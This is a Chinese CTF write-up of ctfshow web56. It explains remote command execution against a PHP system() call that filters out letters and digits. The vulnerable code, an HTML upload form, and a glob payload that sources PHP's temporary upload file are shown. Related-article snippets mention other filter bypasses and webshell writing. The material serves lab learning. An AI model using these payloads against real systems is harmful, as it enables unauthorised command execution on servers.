无字母数字rce(ctfshow web入门56)

最新推荐文章于 2024-08-11 17:33:32 发布
最新推荐文章于 2024-08-11 17:33:32 发布
阅读量3.6k 收藏 14
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45785288/article/details/109435344
版权

无字母数字rce(ctfshow web入门56)

我们根据这一题直接进入主题

//web56
<?php
// 你们在炫技吗?
if(isset($_GET['c'])){
  $c=$_GET['c'];
  if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
    system($c);
  }
}else{
  highlight_file(__FILE__);
}

过滤了字母,数字。

看了三位师傅的 wp才醒悟 y1ng P神 firebasky 再次感谢三位师傅

先说一下这一题的解题思路:

我们通过post一个文件(文件里面写入sh命令),在上传的过程中,通过.(点,也就是 source命令)去执行执行这个文件。一般来说我们上传的文件在linux下临时保存在/tmp/php??????一般后面的6个字符是随机生成的有大小写。(可以通过linux的匹配符去匹配)
**注意:通过.去执行sh命令不需要有执行权限**

好,接下来我已一个小白的角度分析题目所需的知识点。 首先是构造一个post文件上传,这里面也是很复杂的,参考 PHP 文件上传

下面就是我们构造的post文件上传数据包

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

然后直接抓包

在这里插入图片描述
接下来构造poc命令
?c=.+/???/????????[@-[]
用到Linux下的glob通配符:

  • *可以代替0个及以上任意字符
  • ?可以代表1个任意字符
    注:后面的[@-[]是linux下面的匹配符,是进行匹配的大写字母。
    在这里插入图片描述

介绍一下bin目录:

bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等,也就是一些系统命令都在bin 目录下

在这里再解释一下为什么加上#! #!的意思是调用 /bin/sh 命令所以需要加

成功遍历当前目录文件
在这里插入图片描述

直接cat 得到flag

在这里插入图片描述

补充

1.playload:?c=.+/???/???[@-[] 因为 .命令 (也就是source命令)执行需要用空格 我们用 + 绕过(也就是%20)。

2.文件上传的时候 #!/bin/sh 加上 #!的意思是调用bin/sh的命令

3.我们的poc的? 的数量只有11个,因为最后一个匹配为大写,用[@-[] 代替了,不需要在它的后面再加上?了

林一不是01
关注
CTFshow 命令执行 web56
Kradress的博客
12-07 992
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET[
ctfshow web41 无字母数字命令执行
Sapphire037的博客
10-30 2342
1 首先,捋一捋思路,我们可以先看过滤的字符 比如/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i或者/[a-z0-9]/is 这里可以先看P神的一些不包含数字字母webshell ,大概意思就是通过一些字符互相运算后构造得到我们的payload,了解基本原理之后,我们再看ctfshow中的这样一道例题 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31
RCE赛题(目录限制、函数禁用、数字字母过滤、SUID提权)
shao65308的专栏
11-12 118
题目源码:index.phpwaf.php,暂时未知,后面传马了可以看到,先通地fuzz看过虑了哪些数字字母过滤了,取反也过滤了,那么就用异或^来构造个phpinfo();看下信息?成功执行,这两个地方需要突破open_basedir只允许网站根目录和/tmpdisable_fuctions函数禁用比较多file_put_contents函数没有禁用,可以通过构造这个函数写马?>");成功写马cmd.php,用蚁剑连接,https://改成http://才能连接成功。
RCE多种绕过技巧
最新发布
plutochen05的博客
08-11 266
这里的index.php是上面代码的文件名,该HTML文件和index.php在同一目录下(该目录是nginx底下的html目录)他过滤了所有的字母数字,也就是说,不能输入如何字母/数字——即是输入字符,?限制的太严格了,不输入字母数字怎么查询。这个代码在burp中可以这样写,但是在页面的搜索框中输入的话,要将其编码。他限制了代码的长度,不能超过35个字节,下面这个才是最重要的。这个是index.php代码页面的包,是GET的。首先创建一个HTML文件,如下。这个是HTML传送时抓的包。
RCE——远程命令执行(无字母数字篇)
m0_69151365的博客
08-10 805
这道题属于是一个无字母数字的题目,除了高版本的解法之外,我们更应该关注通用版本的解法,我们主要利用的php代码文件上传在代码执行完之前会存放在临时文件里,我们利用它的默认命名方式来进行一个正则匹配,而且Linux一般文件都不会用大写命名,从而写出这个正则来进行匹配。
CTF-WEB-无数字字母rce
m0_74317362的博客
11-17 320
数字字母rce,就和他的名字一样,就是不利用字母数字构造webshell,从而绕过对方的过滤手段。对于无数字字母rce可以处理的过滤手段如下很明显,在这个程序中,数字和字符全部被过滤掉了,便排除了原来的手段。无数字字母rce的原理是什么呢,是利用各种非数字字母字符,经过各种变换,比如异或,取反,自增,构造成单个字母字符,然后把单个字母字符拼接成原构造的payload。
ctfshow-web入门56(再次理解无数字字母rce
qq_44657899的博客
10-18 1807
前言 之前做过一道红包题第二弹,这里也是同样的解法,但是新学到了很多知识点,记录一下。 这个解法,p神的文章讲的很清楚无字母数字webshell之提高篇 文章目录前言glob通配符. 执行文件不需要x权限题解 glob通配符 因为只有PHP生成的临时文件包含大写字母,所以可以用/???/????????[@-[]来匹配我们上传的临时文件。 原理: 翻开ascii码表,可见大写字母位于@与[之间: 那么,我们可以利用[@-[]来表示大写字母: . 执行文件不需要x权限 题解 注意传参方式为POST。
字母数字RCE
Shaun111的博客
11-06 1208
前言 当字母数字都被过滤时怎样构造webshell呢?具体代码如下 <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } 首先,思路就是通过非字母数字的字符经过各种变换构造出任意字母,然后拼接出函数执行 异或 原理 在PHP中,两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,再对二进制数据进行异或,再转为ASCII,最后转为字符串 用法
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 865
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 1898
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
[ctfshow]web入门——命令执行(web40-web53)
ShenZ的博客
11-29 1339
文章目录web40 web40 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
ctfshow web入门 命令执行前篇(web29-web54)
ccfly1012的博客
08-18 1658
目录 web29 web30 web31 web32 web33 web34-web36 web37 web38 web39 web40 web41 web42 web43 web44 web45 web46 web47 web48 web49 web50 web51 web52 web53 web54 web29 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 20
数字字母rce总结(取反、异或、自增、临时文件)
东隅的博客
09-27 7858
数字字母rce的知识点、poc、exp(取反、异或、自增、临时文件)
字母数字rce总结(自增、取反、异或、或、临时文件上传)
whale_waves的博客
02-29 1890
临时文件上传 通过上传文件然后用符号.调用执行文件 第一个知识点: 通过post上传文件,此时php会在linux里的零时文件夹保存文件,且文件一定是php加上六个随机的字符 /tmp/php?????? 这个应php保存的临时文件会有一个特性,就是这6个随机的字符会出现大写的情况 例如: 普通文件/tmp/adcabcabc php保存的临时文件/tmp/phpAvxAsa 第二个知识点: 现在直到了文件上传的位置以及特性那么现在要怎么利用它 shell下支持使用. 来
CTFweb无参数RCE
遇事不决冲冲冲
07-25 2992
1 打开题目便是源代码,通过a的参数来实现RCE <?php #-*-coding: utf-8 -*- //flag in show_flag.php if(isset($_POST['a'])){ $a=$_POST['a']; if (!(preg_match("/[0-9]|\.|data|phar|glob|\*|system|shell_exec|shell|php|\`/i", $a))) { eval($a); } }else{ hig
CTFshow web入门 56
li_n_k的博客
11-15 479
零基础小白
字母RCE
qq_64201116的博客
06-23 1776
字母RCE你到底有多懂,看了也许会更进一步
ctfshow web rce
09-12
根据提供的引用内容来看,这是关于CTFShow网站的Web远程代码执行(RCE)的问题。根据引用中的数据包,我们可以看到一个POST请求的HTML表单,其中包含一个文件上传字段。而根据引用中的源代码,我们可以看到一个GET参数`c`被用于执行系统命令。最后,根据引用中的源代码,我们可以看到一个POST参数`a`被用于执行代码。 所以,CTFShow网站存在Web RCE漏洞,攻击者可以通过构造恶意的请求来执行任意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值